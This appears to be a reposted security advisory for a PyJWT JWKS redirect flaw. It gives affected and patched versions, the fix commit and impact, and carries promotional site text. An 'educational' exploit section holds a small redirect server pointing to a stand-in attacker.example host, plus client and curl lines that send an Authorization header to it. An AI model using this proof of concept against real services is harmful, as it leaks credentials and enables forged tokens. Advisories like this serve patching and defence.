PyJWT, HTTP Redirect JWKS Trust Poisoning, GHSA-9v7f-9g4p-ffgj (Critical) -DC-Sep2026-2634

Listen to this Post

PyJWT provides PyJWKClient for fetching JSON Web Key Sets.
PyJWKClient normally retrieves JWKS from a configured trusted endpoint.
In PyJWT 2.13.0, PyJWKClient followed HTTP redirects during JWKS fetches.
It did not validate the redirect destination before following it.
A trusted endpoint could return a 3xx response to another host.

The client would then request the redirected URL.

If the application passed caller-supplied request headers, those headers went with the redirected request.
This could expose Authorization, Cookie, or custom headers to an attacker-controlled host.
The redirected response could also be treated as authoritative JWKS key material.
An attacker who influences the trusted endpoint response could supply malicious keys.
Those keys could be cached as trusted JWKS content.

This is JWKS trust poisoning.

In mixed-configuration applications, forged JWT acceptance may become possible.
The attack requires attacker-influenced redirect from configured JWKS endpoint.
A token kid alone does not trigger the issue.

Affected versions are PyJWT <= 2.13.0.

The fix disables automatic redirects for JWKS fetches.

The fix commit is 0a795b8e1f6ef08f634aa7086fc41cc6d5ce3e56.

Regression tests verify redirect rejection without contacting destination.

Normal fetches, headers, caching, errors, timeouts, and SSL context remain covered.

PyJWT 2.14.0 contains the verified fix.

PyJWT 2.14.0 was released on 2026-09-11.

It is available on PyPI.

PyJWT 2.14.0 is first release containing fix.

Advisory records 2.14.0 as patched version.

Original reporter credit: GHSA-9v7f-9g4p-ffgj.

Duplicate report GHSA-43g3-98cx-x446 added redirect header-leak evidence.

Duplicate report also added cache-poisoning evidence.

Canonical advisory update preserved duplicate record.

DailyCVE Form:

Platform: PyJWT Python library
Version: <= 2.13.0
Vulnerability : JWKS redirect poisoning
Severity: Critical
date: 2026-09-11

Prediction: 2026-09-11

What Undercode Say:

Analytics

python -m pip install PyJWT==2.13.0
python -m pip install PyJWT==2.14.0
python -c "import jwt; print(jwt.<strong>version</strong>)"
curl -I https://trusted.example/.well-known/jwks.json
curl -L -H "Authorization: Bearer secret" https://trusted.example/.well-known/jwks.json
import jwt
from jwt import PyJWKClient
url = "https://trusted.example/.well-known/jwks.json"
client = PyJWKClient(url, headers={"Authorization": "Bearer secret"})
signing_key = client.get_signing_key_from_jwt(token)

Exploit: (Educational Purposes!)

from http.server import BaseHTTPRequestHandler, HTTPServer
class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header("Location", "https://attacker.example/jwks.json")
self.end_headers()
HTTPServer(("0.0.0.0", 8080), Redirect).serve_forever()
from jwt import PyJWKClient
client = PyJWKClient("http://127.0.0.1:8080/jwks.json", headers={"Authorization": "Bearer secret"})
client.get_jwk_set()

Protection:

python -m pip install --upgrade PyJWT==2.14.0
from jwt import PyJWKClient
client = PyJWKClient(url)
client.get_jwk_set()

Impact:

Header exposure
JWKS trust poisoning
Forged JWT acceptance

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top